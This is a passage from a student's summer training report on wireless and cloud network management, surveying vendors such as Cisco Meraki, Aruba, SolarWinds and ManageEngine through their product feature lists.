Summer Training Project Report

on
WIRELESS NETWORK MANAGEMENT

Under the Guidance of:

Mr. Sushil Kumar

(Senior Manager, IT Infrastructure, Network security and communication,
ITS, Tata Steel)

Submitted by:

Arnab Gupta
th
7 Semester, B. Tech Computer Science and Engineering (2015-2019 batch),
KIIT University, Bhubaneswar
(Tata Steel Prashikshan- 2018, Reference Number- VT20180379)

Page 1 of 56
 Table of Contents

1. Introduction ...............................................................................................................................3
2. Cloud Networking .....................................................................................................................5
3. Available Technologies ............................................................................................................6
4. Cisco Meraki .............................................................................................................................8
4.1. Wireless LAN ....................................................................................................................8
4.2. Cloud Managed Security and SD WAN ............................................................................8
4.3. Cloud Managed Switches ..................................................................................................9
4.4. System Management Software ........................................................................................10
5. Aruba Networks .......................................................................................................................11
5.1. AirWave ............................................................................................................................11
5.2. ArubaCentral.....................................................................................................................12
6. SolarWinds...............................................................................................................................14
6.1. Network Management Tools ............................................................................................14
6.1.1. Network Management Monitor..............................................................................14
6.1.2. Network Configuration Manager ...........................................................................15
6.1.3. Log Manager ..........................................................................................................16
6.1.4. IP Address Manager ...............................................................................................17
6.1.5. User Device Tracker ..............................................................................................18
6.1.6. Netflow Traffic Analyzer .......................................................................................19
6.1.7. Network Topology Mapper....................................................................................20
6.2. Security Management Tools .............................................................................................21
6.2.1. SIEM tool ...............................................................................................................21
6.2.2. Patch Manager .......................................................................................................22
7. Managed Wi-Fi ........................................................................................................................23
8. Managed Engine ......................................................................................................................24
8.1. OpManager .......................................................................................................................24
8.2. NetFlowAnalyzer ..............................................................................................................25
8.3. Network Configuration Manager ......................................................................................27
8.4. OpUtils ..............................................................................................................................28
9. Wireless Enterprise Attacks .....................................................................................................29
10. Heat Map Testing .....................................................................................................................37
11. Cryptographic Measures to increase Network Security...........................................................44
12. Comparative study between different cloud network management system.............................48
13. Conclusion ...............................................................................................................................54
14. References ................................................................................................................................56

Page 2 of 56
 INTRODUCTION
A network management system (NMS) is a set of hardware and/or software tools that allow an
IT professional to supervise the individual components of a network within a larger network
management framework.

Key features of a network management tool are:

1. Network device discovery – Identifying devices present in a LAN or WAN

2. Network device health monitoring – Monitoring individual devices in a network to
determine whether the health and performance of the network components matches the
capacity plans and intra-enterprise service-level agreements.
3. Real-time Network Performance Analysis – Tracking performance indicators like
bandwidth utilization, packet loss, latency, availability and uptime of routers, switches and
SNMP enabled devices.
4. Maintenance and firmware management – Performing firmware updates and updating
device licenses on network devices.
5. Reporting – Generate periodic reports of device and network health and also a security
report in case of any intrusion detected by the monitoring devices.

Limitations:

Security in Wireless Network Connections

Ad-hoc wireless network signals are not really strong as compared to the wireless connection
which uses routers to function properly. Wireless networks incur high cost but are really easy to
implant. However, the actual challenge comes when we try to secure its signals. Insecure
wireless network can be attacked by hackers. Wireless connections are not preferred to the banks
and other sensitive departments. Where loss of information means loss of everything. Wireless
signals are easy to catch as compared to wired signals. For the safety of reliable transfer of data,
still the experts prefer wired connections.

Other Limitations to Wireless Networks

When the wireless signals are transferred they are blocked by the certain obstacles as walls, gates
and human beings. The strength of wireless signals depends upon the location; if you’re closer to
infrastructure you receive signals. For example, if a wireless infrastructure is established in any
university campus. Students spread throughout the campus cannot access the signals because the
strength of signals varies from location to location. In short whole university campus cannot be
benefited from the single wireless connection. Wireless signals can be hindered by other
electronic devices, the rate of frequency and the height from the ground. The fear of the
unauthorized users is the biggest concern for people transferring sensitive information. The
reason is that if your wireless internet connection is not secured using internet any unauthorized

Page 3 of 56
user can exploit the signals or even hack important information. The use of ad hoc wireless
technology requires the use of very expensive personal digital devices or PDAs like black berry,
palmtops, laptops and smart phones. The recent up gradation of wireless technologies also
requires you to improve your knowledge about how to make use of any wireless technology.
Though wireless technology is very common but still it is an expensive way of remain
connected. Wireless network is relatively less stable and efficient than a wired connection. It
operates on the rule, the nearer the faster. Initial setup is complicated. Wireless connection
requires the setup of stations. Stations are those transmission mediums which help the wireless
system to operate.

Cost associated with wireless network upgradation and maintenance

The cost of establishing wireless network can also be termed as one of its limitations. Any
802.11g router can approximately be an expense of about $25 to $125. Laptop card or PCI card
can cost up to $50 to $150. This is not it one may also consider the additional costs associated
with wireless connection. For example, additional cost of connecting a router to DSL modem. If
the router connected to the DSL operates at a distance of 100 meters away then an additional
router is attached to receive the signals. The cost of managing and upgrading the wireless
network cannot be neglected at all.

Page 4 of 56
 CLOUD NETWORKING
Cloud networking (and Cloud based networking) is a term describing the access of networking
resources from a centralized third-party provider using Wide Area Network (WAN) or Internet-
based access technologies.
Cloud networking is related the concept of cloud computing, in which centralized computing
resources are shared for customers or clients. In cloud networking, the network can be shared as
well as the computing resources. It has spurred a trend of pushing more network management
functions into the cloud, so that fewer customer devices are needed to manage the network.

Benefits Realized with Cloud Networking

Lower Costs: With cloud networking, companies would have lower capital expenditures as
opposed to purchasing all their own equipment and software. In addition, there is no worry about
purchasing upgrades on hardware or software; the cloud networking provider takes care of this.
Cloud networking is based on a pay-per-use model and payments will usually be monthly or
yearly. Cloud networking is also considered a green solution since no rack space is used and
results in lower utility costs.

Fast Deployment: Another major benefit of cloud networking is faster deployment as compared
to purchasing and installing your own networking equipment. Many cloud networking
applications such as network management can be turned on within a few days, hours, or even
minutes depending on the provider. Using cloud networking lets IT users quickly utilize new
applications without spending time installing and configuring networking equipment.

Instant Scalability: The ability to quickly add capacity is a huge benefit with cloud networking.
Instead of IT procuring more networking hardware and/or software in-house for their additional
end-users and waiting weeks or months to be up and running, cloud networking providers can
quickly enable IT customers

Mobility Since cloud networking applications are typically Web-based, IT users can access their
network related data at any time and from anywhere using any device with Internet capability. IT
users don’t have to be tied to their desks.

Page 5 of 56
 AVAILABLE TECHNOLOGIES

The following are the available enterprise wireless network management systems: -

• Cisco Meraki: Cisco Meraki offers robust and easy to manage cloud switches and firewalls.
Combining all three products into a single unit for small businesses and branch offices is a
great way to cut costs and reduce complexities. It’s also exciting to see enterprise-grade
wireless security features such as unified threat management (UTM).

• Aruba Networks: HP enterprise company, Aruba is looking to get into the rapidly
expanding IoT market by updating its ClearPass Policy Manager to allow for easier
management of Wi-Fi-connected IoT devices.

• 4ipnet: A relatively smaller vendor as compared to the likes of Cisco and Aruba, 4ipnet is a
Taiwan-based company looking to aggressively expand into regions around the globe. 4ipnet
is especially popular in the public Wi-Fi space thanks to the wide variety of methods that end
users can authenticate. This includes authentication via common social networks such as
Facebook, Google+, OpenID, and social apps that are popular in localized regions throughout
the world. By offering free Wi-Fi in exchange for personal information gleaned through
social media authentications, public Wi-Fi providers are coming up with unique ways to
mine and monetize this data.

• Zebra Technologies: Zebra Technologies, the company that acquired Motorola Solutions in
2014 -- largely for its wireless portfolio and customer base -- is banking on the fact that
enterprises are tired of being in the dark when it comes to troubleshooting application
performance problems on the WLAN. The company's recently released Zebra NSight
platform provides the visibility and analytics that many WiFi administrators seek.

• Edgecore Networks: Known for its open-source layer 2 and layer 3 switches, Edgecore is
seeking to make its name in the world of WiFi by offering the industry’s first open WiFi
products. While open networking is hot, it’s not made a tremendous impact in the world of
enterprise WLANs.

• Aerohive Networks: Aerohive sells a range of WiFi access points, routers and switches, as
well as its flagship HiveManager NG network management software, which is described as a
"next-generation, enterprise-class cloud-enabled network management solution." The
company has won quite a bit of industry recognition over the past couple of years, including
being named a "visionary" mobility solution by Gartner, and being ranked the number 245
fastest-growing company in North America on Deloitte’s 2015 Technology Fast 500.

Page 6 of 56
• Cloud4Wi: Cloud4Wi's flagship product is a guest WiFi platform called Volare. The
company's customer list includes Armani, Bulgari, Burger King, Clarks Shoes, Olive Garden,
Prada and Telecom Italia, and it claims to serve more than 45 million mobile users across
15,000 locations in more than 80 countries. Headquartered in San Francisco, it also has
offices in London, Paris, Milan, Pisa and Singapore.

• Relay2Wireless Networks: Founded in 2011, Relay2 sells cloud-managed wireless network

management services. In March, it launched the RA200, an enterprise-class, cloud-managed
Service-Ready Access Point. The company primarily serves large customers in the retail,
hospitality, sports and conference venue industries. Relay2 claims that its platform
"combines the full strengths of both the cloud and the network edge to enable innovative new
services over WiFi for service providers and their business customers by bringing cloud-
managed intelligence, applications, and content to the edge of the network, as close as
possible to mobile customers, guests, employees, and smart devices."

• Mojo Networks: Formerly known as AirTight Networks, Mojo Networks has dramatically
refreshed its WiFi offerings by getting into the highly popular cloud-managed WLAN
market. Mojo is hoping to compete with other wireless cloud vendors such as Cisco Meraki
and HPE Aruba.

• Xirrus: ping on the red-hot as-a-service bandwagon with its CommandCenter product.
According to Xirrus, CommandCenter, along with its existing Xirrus Management System
(XMS) “radically simplifies the ability for MSPs to offer Wi-Fi-as-a-Service (WaaS) to their
customers.” Even more appealing, CommandCenter is offered to MSPs for free.

• Open-Mesh: The thing that sets Open-Mesh apart from other wireless AP vendors is the
modular design to its hardware. Customers can buy an access point with the bandwidth,
range and other features that best suits their needs and then select an appropriate enclosure,
whether their AP will be located indoors, outdoors, on a wall, or on a ceiling. The company
also offers free cloud controller software called CloudTrax. It includes free iOS and Android
apps that enable WiFi network management from mobile devices. The team behind Open-
Mesh used to be involved with the MIT Roofnet project, which provided the technology for
Meraki products; Meraki was later acquired by Cisco.

Page 7 of 56
 CISCO MERAKI

Cisco Meraki is a cloud managed IT company headquartered in San Francisco, California. Their
solutions include wireless, switching, security, EMM, communications, and security cameras, all
centrally managed from the web. Meraki was acquired by Cisco Systems in December 2012

Cisco Meraki products

• Wireless LAN:

Overview: Cisco Meraki access points are built from the highest-grade components and
carefully optimized for a seamless user experience. The outcome: faster connections, greater user
capacity, more coverage, and fewer support calls. Meraki access points provide deep network
insight enabling smarter network management.

Key Features:

1. Enhanced CPU for deep packet inspection.

2. Multigigabit ethernet for 2.5 Gbps over a single cable.
3. Entire network can be monitored using a single system implemented via cloud. This
eliminates the complexity of traditional wireless controllers.
4. Dedicated Security Radio which continuously scans and protects against any security
threats.
5. Identity-based firewall that automatically assigns traffic shaping rules, VLAN tags,
bandwidth limits to enforce the right policies for each class of users.
6. Centralized management via a user-friendly web interface or android/iOS mobile
application

• Cloud Managed Security and SD-WAN:

Overview: Software-defined WAN (SD-WAN) is a suite of features designed to allow the

network to dynamically adjust to changing WAN conditions without the need for manual
intervention by the network administrator. By providing granular control over how certain traffic
types respond to changes in WAN availability and performance, SD-WAN can ensure optimal
performance for critical applications and help to avoid disruptions of highly performance-
sensitive traffic, such as VoIP.

Key Features:

1. Unified visibility and control of the entire network via a single dashboard: wireless,
switching, and security appliances
2. Streamlines large networks with tens of thousands of endpoints
3. Integrated IDS/IPS engine based on Snort

Page 8 of 56
4. Built-in multi-site network management tools
5. Automated network monitoring and alerts
6. Intuitive interface eliminates costly training or added staff
7. Role-based administration and auditable change logs
8. Continuous feature updates delivered from the cloud
9. Layer wise traffic classification and control up to layer 7.

• Cloud Managed Switches:

Overview: The Cisco Meraki MS are cloud managed access and aggregation switches,
combining the benefits of cloud-based centralized management with a powerful, reliable access
platform. With cloud management, thousands of ports can be simultaneously managed and
configured using a single web interface regardless of its location.

Key Features:

1. Multigigabit ethernet provides the higher performance demanded by latest access points over
existing cables.
2. Protects the wired network from both external and internal security threats
3. Network topology view in real-time, showing devices and their connections and even
monitor network-wide health.
4. Remote live tools for identifying and correcting issues remotely.

Page 9 of 56
• System Management Software:

Overview: Cloud based systems manager offers a complete set of features for Endpoint
Management customers as well as business critical requirements for enterprise environments.

Key Features:

1. Centralized Cloud Management dashboard enables secure monitoring and management of all
wireless devices remotely using a single web-based/android interface.
2. Remote troubleshooting and automatic monitoring of devices with an extended feature of
remote desktop connection for better access and control.
3. Define, edit or delete user and group policies for devices in a network.
4. Real-time network topology detection and viewing.
5. Define and deploy network settings such as wireless connectivity, security policies, and
remote VPN access to all network devices at once.
6. Protect devices and their data, control their usage with fine-grained policies, and restrict
access to features such as the app store, gaming, and content.
7. Tie Systems Manager polices to the wireless, switch, and security appliance networks. Use
Systems Manager certificates to securely connect users to WiFi.
8. Easy deployment and maintenance of free, paid, or Enterprise mobile apps. For Macs and
PCs, deploy MSI and PKG files right from the dashboard.

Page 10 of 56
 ARUBA NETWORKS
Aruba, a Hewlett Packard Enterprise Company, is a vendor of data networking solutions for
enterprises and businesses worldwide. Aruba Networks was founded in 2002 and is focused on
bringing Wi-Fi wireless LAN mobility solutions to enterprise networks. With its acquisition by
Hewlett-Packard (now Hewlett Packard Enterprise) in 2015, Aruba Networks has become the
entity of Hewlett Packard Enterprise bringing to market all campus and small business data
networking offerings of HPE. Its core products are wireless Access Points (APs), wired switches,
mobility controllers, and network management software.

Aruba Networks products:

▪ AirWave: AirWave lets you monitor client behavior, proactively troubleshoot application
issues, and plan for capacity.

Key Features
1. Mobile Application Usage Visibility: With Aruba AppRF, AirWave provides deep
visibility into performance and usage of mobile and web apps. Reputation reports allow
you to quickly take action against high risk sites and control Wi-Fi usage by app
category. User role, device type and location specific insights let you make quick
decisions to protect business critical apps.
2. Multi-vendor compatibility: Get granular visibility across your entire access
infrastructure and manage multiple generations of wired and wireless networks from just

Page 11 of 56
 about any vendor – from controllerless to controller-managed and from legacy Wi-Fi to
the latest 802.11ac WLANs.
3. Image Management: AirWave allows you to manage firmware updates on WLAN
devices by defining a minimum acceptable firmware version for each make and model of
a device. It remotely distributes the firmware image to the WLAN devices that require
updates, and it schedules the firmware updates such that updating is completed without
requiring you to manually monitor the devices.
4. Intrusion Detection System: AirWave provides advanced, rules-based rogue
classification. It automatically detects rogue APs irrespective of their location in the
network and prevents authorized IAPs from being detected as rogue IAPs. It tracks and
correlates the IDS events to provide a complete picture of network security.
5. RF Visualization Support for Instant: AirWave supports RF visualization for Instant.
The VisualRF module provides a real-time picture of the actual radio environment of
your wireless network and the ability to plan the wireless coverage of new sites.
VisualRF uses sophisticated RF fingerprinting to accurately display coverage patterns
and calculate the location of every Instant device in range. VisualRF provides graphical
access to floor plans, client location, and RF visualization for floors, buildings, and
campuses that host your network.

▪ Aruba Central: Aruba Central is a powerful cloud-based network management solution that
offers built-in analytics for actionable network and business insights. With Central, managing
Aruba Instant access points, switches, and branch controllers from the cloud ensures 24 by 7
access, visibility and control. Visitors, contractors and suppliers can access guest Wi-Fi
through a customizable enterprise-grade portal. Whether managing one location or many,
Central delivers the power of the cloud.

Page 12 of 56
Key Features
▪ Maintenance and Firmware Management: Streamline and automate your network
management while maintaining complete control.
1. Perform one-click firmware updates or schedule specific updates.
2. Manage device licenses and user accounts with different levels of access to
Central.
3. Create groups and tag devices with labels to simplify firmware management and
configuration.
▪ Network Health Monitoring and Troubleshooting
1. Check alerts by AP, switch name, MAC address, serial number, or any other
attribute – and then click on the device for more detail.
2. Easily check connected clients, memory usage and firmware for fast
troubleshooting.
3. Individually track a client’s wireless connection, including signal strength, speed,
association history, and device type.
4. Quickly identify rogue access points with built-in Wireless Intrusion Detection
System (WIDS).
5. Launch the command line interface directly into an AP or switch if needed.
▪ Reporting: Store data indefinitely to create reports containing historical data for
internal and external compliance requirements.
1. View network, AppRF and security snapshots over a predefined period.
2. Schedule reports and receive automated email reports. Export them to PDF for
low-effort monitoring.
3. Generate Payment Card Industry (PCI) reports that document proper security
scanning was in place.

Page 13 of 56
 SOLARWINDS
SolarWinds Inc. is a company that develops software for businesses to help manage their
networks, systems, and information technology infrastructure. SolarWinds is headquartered in
Austin, Texas, with sales and product development offices in a number of locations in the United
States and several other countries around the world. The company was publicly traded from May
2009 until the end of 2015. It has also acquired numerous companies in the last decade, some of
which it still operates under their original brand names including Pingdom, Papertrail, and
Loggly.

SolarWinds Network Management products

1. Network Management Monitor

Reduce network outages and improve performance with advanced network monitoring
software.

Key Features

▪ Multi-vendor fault, performance, and availability monitoring with Network

Performance Monitor. Reduce network outages and quickly detect, diagnose, and
resolve multi-vendor network performance issues with affordable, easy-to-use network
monitoring software.

Page 14 of 56
 ▪ Visual representation of the health and performance of critical network gear.
Reduce visibility gaps into critical network switches, firewalls, and load balancers with
Network Insight for Cisco Nexus, Cisco ASA, and F5 BIG-IP.
▪ View contextual and graphical portrayals of an entity and its physical and logical
relationships with auto-updating maps. See relationships for routers, switches,
interfaces, volumes, and groups, updated automatically without user intervention so it can
maintain the network, not the network maps.
▪ Advanced network troubleshooting for on-premises, hybrid, and cloud services with
critical path hop-by-hop analysis. Finds out with hop-by-hop analysis on-premises and
into the cloud with NetPath.
▪ PerfStack™ cross-stack network data correlation. Accelerate identification of root
cause by dragging-and-dropping network performance metrics on a common timeline for
immediate visual correlation across all your network data.
▪ Advanced Alerting: Reduce the flood of unnecessary network alerts. Create alerts based
on simple or complex nested trigger conditions, defined parent/child dependencies, and
network topology.
▪ Wireless Network Monitoring and Management: Easily identify dead zones and
improve wireless coverage. With our network monitoring tool, you can access out-of-the-
box wireless reports, including wireless availability and rogue access points.
▪ Network Performance Baseline: Configure alerts accurately by calculating dynamic
baseline threshold data with our network performance monitoring software.

2. Network Configuration Manager

Automated network configuration and compliance management.

Page 15 of 56
 Key Features

▪ Network Automation: Manage rapid change across complex and multi-vendor

networks, reduce time needed to complete repetitive tasks, and maintain standards and
service levels for uninterrupted IT.
▪ Network Compliance: Simplify network compliance using NCM’s automated network
configuration tools to deploy standardized configs, detect out-of-process changes, audit
configurations, and even correct violations.
▪ Configuration backup: Rest easy knowing you can locate the most current
configuration and quickly apply it to a replacement spare, or to roll back a blown
configuration.
▪ Vulnerability assessment: Take the hassle out of vulnerability scanning using NCM's
integration with the National Vulnerability Database and access to the most current
CVE’s to identify vulnerabilities in your Cisco devices.
▪ Device lifecycle management: Always know what devices are connected to your
network, their hardware and software configurations, and when they approach end-of-
service and end-of-life.
▪ Incident reporting: Use NCM's 53 included reports to keep stakeholders informed with
the current state of your network inventory, configuration, changes, policy compliance,
security, and planning requirements.
▪ Integration with SolarWinds NPM: NCM’s network change management works even
better when used with SolarWinds Network Performance Monitor to detect more faults,
and to identify and correct configuration errors.
▪ Centralized Administration: Use NCM's integrated console to lock down devices from
unauthorized access, delegate who can view device details and make configuration
changes and determine when network changes can occur.
▪ Enterprise Command Console: SolarWinds Enterprise Operations Console collects
performance data from an installed base of multiple SolarWinds servers, and summarizes
this data into a composite, centralized view.

3. Log Manager for Orion

Aggregate, search, and chart log data within the Orion® Platform

▪ Syslog and trap collection and analysis: Your infrastructure is constantly generating
log data to provide performance insight. Collect, consolidate, and analyze thousands of
syslog and traps to perform root cause analysis.
▪ Real-time log stream: Traditional log collection and management tools generate reports
in plain text or HTML. SolarWinds Log Manager displays logs in an interactive real-time
log stream.
▪ Event log tagging: Easily apply (color-coded) tags to your log data to aid with filtering,
searching, and identifying performance issues.

Page 16 of 56
 ▪ Powerful search and filter: Perform searches using basic matching. Execute searches
using multiple search criteria and apply filters to narrow results. Save, schedule, and
export search results.

4. IP Address Manager
Save time and prevent costly errors with affordable, easy-to-use IP address management
software

Key Features

▪ Automated IP Address tracking: Use active scanning to discover and track subnets and
associated address blocks and view transient IP addresses to easily identify abandoned IP
addresses and reclaim them.
▪ Integrated DHCP, DNS and IP address management: Find an open IP address and
make the DHCP reservation and DNS entries all at once from a single console.
▪ IP alerting, troubleshooting, and reporting: Monitor IP address usage, receive alerts
on subnet capacity issues and IP address conflicts, and quickly resolve issues that impact
performance.
▪ Multi-vendor DHCP and DNS support: Manage and monitor Microsoft, Cisco, and
ISC DHCP servers as well as BIND and Microsoft DNS servers from a centralized
console. Create, edit, or remove scopes or DNS zones and records.
▪ Automated static IP address requests: Automatically make reservations or enable users
to request IP addresses utilizing the built-in IP request wizard. IPAM also offers
automated reporting capabilities to track requests for compliance or change management
purposes.

Page 17 of 56
 ▪ VMWare Integration: IPAM integrates with VMware vRealize Orchestrator
(vRO)/vRealize Automation (vRA) to automate the provisioning of IP addresses and the
updating of DNS records of virtual machines. Automating these tasks enables virtual
environments to scale dynamically.
▪ IP details and history tracking: In-depth details on all of all IPs and how they’ve been
used, even if they’re ancient history.
▪ Cloud DNS monitoring: Monitor both your Amazon Web Services (AWS) Route 53 and
Azure DNS zones and records without having to log in to separate management consoles.

5. User Device Tracker

Locate users and devices on your network with User Device Tracker

Key Features

▪ Network device location: Immediately locate network devices on your LAN and
wireless network, and retrieve switch name, port, port description, VLAN, VRF data,
vendor information, all from a single console.
▪ User Identification: Gathers user details and reveal all endpoint logins, specifically
endpoint name and most recent login time.
▪ Device access history and log reports: Using “History Connections” and “All User
Logins” to unveil the date and time users entered a network, through which specific node
port, SSD, or access point, via what connection type.
▪ Device support: Take advantage of multi-vendor device support that’s compatible with
many SNMP-managed switches and access points.
▪ Port details: View port description, VLAN assignment, connected MACs, and port
configuration.

Page 18 of 56
 ▪ Turn on and off remote ports: Remotely shutdown a compromised network device port
with point-and-click simplicity. Detect rogue devices and shutdown the port to mitigate
security risks or prevent network problems.
▪ Unified IT-administration dashboard: The UDT dashboard integrates with other
SolarWinds management products including Network Performance Monitor, IP Address
Manager, Network Configuration Manager, and more.

6. NetFlow Traffic Analyzer

Network traffic analyzer and bandwidth monitoring software

Key Features

▪ Bandwidth monitoring: Monitoring of Cisco NetFlow, Juniper J-Flow, sFlow, Huawei

NetStream, and IPFIX flow data identifies which applications, and protocols are
consuming the most bandwidth.
▪ Network traffic analysis: NetFlow Traffic Analyzer collects traffic data, correlates it
into a useable format, and presents it to the user in a web-based interface for monitoring
network traffic.
▪ Malicious traffic identification using deep packet inspection: TCP/UDP monitoring of
port 0 traffic highlights any flows directed to port 0 so you can quickly identify intrusive
traffic.
▪ WLC traffic monitoring: In today's mobile world, it's important to keep your wireless
network running smoothly. With WLC network traffic analysis, you can easily see what's
using your wireless bandwidth.

Page 19 of 56
 ▪ Performance Analysis: Accelerates identification of root cause by dragging-and-
dropping network performance metrics on a common timeline for immediate visual
correlation across all your network data.
▪ NBAR2 advanced application recognition: Cisco NBAR2 support gives you visibility
into HTTP (port 80) and HTTPS (port 443) traffic without the need for additional probes,
spanning ports, etc.

7. Network Topology Mapper

Automatically plot your network in minutes with network mapping software.

▪ Automated device discovery: Automatically discover your entire network and create
comprehensive, detailed network maps in minutes. You can also edit node details of map
objects and connect network devices manually.
▪ Auto detection to topology changes: Keep your network up to date by automatically
detecting new devices and changes to network topology with scheduled network
scanning.
▪ Multilevel network discovery: Keep your network up to date by automatically detecting
new devices and changes to network topology with scheduled network scanning.
▪ Export network maps: Network maps can be exported to Microsoft Office Visio, PDF,
and PNG formats, and also schedule updated map exports to Orion® Network Atlas.

Page 20 of 56
IT Security Management Tools

1. Security Information and Event Management (SIEM) Tool

Log & Event Manager makes it easy to use logs for security, compliance, and
troubleshooting

Key Features

▪ Realtime event co-relation: Receive instant notification and quickly remediate threats
by processing log data in-memory.
▪ Threat Intelligence: Alert on suspicious security events via a threat intelligence feed that
inspects for matches against known bad hosts and other risks to your environment.
▪ Advanced search and forensics analysis: Values shown instantly with built-in defaults,
correlation rules, reports, and active responses.
▪ USB device monitoring: Gain valuable insight into USB device and file activity while
enforcing USB privacy policies.
▪ Active response: Instant threat migration with automated actions that block IPs, disable
users and stop running ports or malicious/infected services remotely.
▪ IT attack reports: Streamline compliance with out-of-the-box reporting for HIPAA, PCI
DSS, SOX, ISO, NCUA, FISMA, FERPA, GLBA, NERC CIP, GPG13, DISA STIG, and
more.

Page 21 of 56
2. Patch Manager
Intuitive patch management software for quickly addressing software vulnerabilities

Key Features

▪ Microsoft WSUS patch management: WSUS is an excellent tool, but it lacks the ability
to effectively schedule patches and report on patch status and inventory. Manage patches
for your Microsoft products, and diagnose and fix problems from the Windows Update
Agent.
▪ Integrations with SCCM: Despite using SCCM, when it comes to patch management
and software distribution of non-Microsoft updates, things can get complicated. View
details for a variety of 3rd-party software patches and the status of endpoints managed by
SCCM.
▪ Vulnerability management: Discovery of patch statuses and vulnerabilities of all
Microsoft and other 3rd-party applications.
▪ Pre-built/pre-tested packages: Using 3rd-party app packages, including Java, that are
already built and tested by SolarWinds.
▪ Patch status dashboard: Tracking who got patched, with what, and what still needs to
be patched is hard enough, especially with new patches mounting. View the latest
available patches, top 10 missing patches, and the general health of your environment.
▪ Patch compliance reports: Determine the status of patches and demonstrate patch
compliance to auditors and internal stakeholders.

Page 22 of 56
 MANAGED Wi-Fi
Managed WiFi provides WiFi Internet access for guests, students, customers and employees
throughout the property. The design will typically include devices such as wireless controllers,
Wireless Access Points (or WAPs), switches and extensive cabling.
Managed WiFi (Wireless LAN) provides private wireless access for employees and a public
WiFi network for guests in one fully managed, end-to-end solution. The service includes built-in
security and handles over 100 users per access point. Plus, it grows with your business, from a
single access point to a large network with thousands of access points.
• Gather insightful data to help understand foot traffic and another user behavior
• Analyze key metrics by location such as loyalty, traffic times, and visitor dwell time
• Generate traffic with targeted offers over mobile
• Empower employees to access business applications and move about freely to serve
customers using WiFi-enabled devices
• Outsource the wireless network design, configuration, installation, monitoring, and support

Managed Wi-Fi Enterprise Solutions

• Mojo Networks Cloud Wi-Fi: Harnessing the power of cloud, big data analytics and
automation, Mojo's cloud WiFi solution enables wireless networks to learn, predict, protect,
and improve automatically. Our Cognitive WiFi™ platform becomes your root cause
analysis engine and augments the network admin's ability to fill gaps in intelligence, speed
and accuracy.
• Aruba AirWave network management: Offering granular visibility into wired and wireless
networks, AirWave is the only management platform designed with mobile devices and apps
in mind. By proactively monitoring the health and performance of all things connected,
AirWave lets IT gain the insights they need to support the digital workplace.
• Aerohive HiveManager: Aerohive has invented cloud network management and has
designed the HiveManager network management system for cloud, from the ground up. The
result is a true next-generation platform for wireless cloud networking, that drastically
reduces operational complexity and cost for our customers and partners. HiveManager
radically simplifies unified management of wired and Wi-Fi access networks, combining
streamlined configuration workflows, real-time client and event monitoring, simplified
troubleshooting, versatile RF planner tools, and API integrations.
• Manage Engine: With networks becoming even more complex over time, having a robust
network monitoring solution in place is crucial. OpManager offers comprehensive network
monitoring capabilities that help you monitor network performance, detect network faults in
real time, troubleshoot errors, and prevent downtime. Being a powerful network monitor, it
supports multi-vendor IT environments and can scale to fit your network, regardless of its
size. Monitor your devices and network to gain complete visibility and control over your
entire network infrastructure.

Page 23 of 56
 MANAGED ENGINE
ManageEngine crafts the industry's broadest suite of IT management software. We have
everything you need—more than 90 products and free tools—to manage all of your IT
operations, from networks and servers to applications, service desk, Active Directory, security,
desktops, and mobile devices.

Managed Engine network monitoring and management tools

1. OpManager
OpManager offers comprehensive network monitoring capabilities that help you monitor
network performance, detect network faults in real time, troubleshoot errors, and prevent
downtime. Being a powerful network monitor, it supports multi-vendor IT environments and
can scale to fit your network, regardless of its size. Monitor your devices and network to gain
complete visibility and control over your entire network infrastructure.

Key Features

▪ Network Health Monitoring: Visualize and resolve WAN/ router problems. Monitor
router and interfaces, bandwidth, WAN links for availability and performance.
▪ VoIP Monitoring: Proactively monitors VoIP call quality across WAN infrastructure
and troubleshoot poor VoIP performance.
▪ Network Mapping: Automatic L1/L2 network mapping to visualize and pinpoint
network outages and performance degradation.
▪ Server Monitoring: Monitor both physical and virtual servers across multiple vendor OS
such as Windows, Linux, Solaris, Unix, VMware etc.

Page 24 of 56
 ▪ Hyper-V Monitoring: Uses WMI credentials to monitor Microsoft hyper-v hosts and
guests performance in-depth with over 40 deep metrics.
▪ Process Monitoring: Monitor and manage processes that are running on discovered
devices through SNMP/ WMI/ CLI.
▪ System Health Monitoring: OpManager uses protocols such as SNMP, WMI or CLI to
monitor system resources and gather performance data.
▪ Network Monitoring Tools: Collection of OpManager's network monitoring tools that
helps perform the first and second level troubleshooting tasks.
▪ Windows Event Log Monitoring: Centralized eventlog monitoring to monitor critical
security logs across all windows servers and workstations in your network.
▪ Network Performance Reporting: Analyze network availability, usage trends and
performance analysis by over 100 off-the-shelf and customizable reports.
▪ Network Traffic Analysis: Helps track network bandwidth usage in real-time, help keep
tabs on the top users of bandwidth on your network and ensure business critical
applications get maximum priority.

2. NetFlow Analyzer
NetFlow Analyzer, a complete traffic analytics tool, leverages flow technologies to provide
real time visibility into the network bandwidth performance. NetFlow Analyzer is a unified
solution that collects, analyzes and reports about what your network bandwidth is being used
for and by whom. NetFlow Analyzer is the trusted partner optimizing the bandwidth usage of
over a million interfaces worldwide apart from performing network forensics and network
traffic analysis.

Page 25 of 56
Key Features
▪ Bandwidth Monitoring & Traffic Analysis: Monitors network bandwidth and traffic
patterns at an interface-specific level. Drills down into interface level details to discover
traffic patterns and device performance. Get real-time insight into your network
bandwidth with one-minute granularity reports.
▪ Network Forensics and Security Analysis: Detects a broad spectrum of external and
internal security threats using Continuous Stream Mining Engine technology. Track
network anomalies that surpass your network firewall. Identify context-sensitive
anomalies and zero-day intrusions using NetFlow Analyzer.
▪ App-centric Monitoring and Shape app traffic: Recognizes and classify non-standard
applications that hog your network bandwidth using NetFlow Analyzer. Reconfigure
policies with traffic shaping technique via ACL or class-based policy to gain control over
bandwidth-hungry applications. NetFlow Analyzer leverages on Cisco NBAR to give you
deep visibility into layer 7 traffic and recognize applications that use dynamic port
numbers or hide behind well-known ports.
▪ Capacity Planning and Billing: Makes informed decisions on the bandwidth growth
using capacity planning reports. Measures the bandwidth growth over a period time with
long term reporting. Accurate trend over extended historic periods. Generates on-demand
billing for accounting and departmental chargebacks.
▪ Multivendor Support & Flow Technology: Collects, Analyzes flows from major
devices like Cisco, 3COM, Juniper, Foundry Networks, Hewlett-Packard, extreme and
other leading vendors. Reports on all major flow formats like NetFlow, sFlow , cflow, J-
Flow , FNF, IPFIX, NetStream, Appflow and so on.
▪ Monitor Voice, Video and Data effectively: Analyze IP service levels for network-
based applications and services using NetFlow Analyzer IP SLA monitor. Ensure high
level of data and voice communication quality using Cisco IP SLA technology. Keep a
tab on key performance metrics of voice and data traffic.
▪ Router traffic monitoring: Monitor your critical networking devices(routers/switches)
using flows and generate mission-critical information to ensure that your network
bandwidth is appropriately used.
▪ High Performance Reporting Engine: A powerful add-on to NetFlow Analyzer which
